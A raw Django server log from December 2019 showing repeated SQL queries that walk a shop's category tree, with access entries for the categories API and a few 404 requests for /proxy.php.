"shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 06:52:15,574 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 06:52:15,576 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 06:52:15,578 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 06:52:15] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 06:57:00] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [13/Dec/2019 06:58:51] "GET /proxy.php HTTP/1.0" 404 6627 DEBUG 2019-12-13 07:00:11,125 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:00:11,134 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:00:11,137 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:00:11,140 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:00:11,142 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:00:11,145 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:00:11,148 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:00:11,150 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:00:11,152 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:00:11,154 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:00:11,158 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:00:11] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 07:08:54,854 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:08:54,858 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:08:54,861 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:08:54,863 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:08:54,865 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:08:54,868 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:08:54,870 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:08:54,872 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:08:54,874 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:08:54,876 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:08:54,879 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:08:54] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [13/Dec/2019 07:10:10] "GET /proxy.php HTTP/1.0" 404 6629 DEBUG 2019-12-13 07:13:20,600 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:13:20,605 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:13:20,607 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:13:20,612 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:13:20,615 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:13:20,618 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:13:20,620 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:13:20,622 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:13:20,626 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:13:20,629 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:13:20,631 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:13:20] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 07:14:25,105 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:14:25,110 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:14:25,113 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:14:25,115 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:14:25,117 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:14:25,119 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:14:25,122 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:14:25,124 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:14:25,126 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:14:25,129 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:14:25,131 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:14:25] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:15:37] "GET / HTTP/1.0" 302 0 [13/Dec/2019 07:20:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 07:28:21] "GET / HTTP/1.0" 302 0 [13/Dec/2019 07:35:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 07:36:49,360 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:36:49,365 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:36:49,368 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:36:49,370 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:36:49,373 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:36:49,378 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:36:49,382 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:36:49,386 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:36:49,390 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:36:49,394 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:36:49,398 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:36:49] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:40:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 07:45:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 07:49:58,875 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:49:58,881 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:49:58,883 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:49:58,886 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:49:58,888 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:49:58,892 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:49:58,894 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" 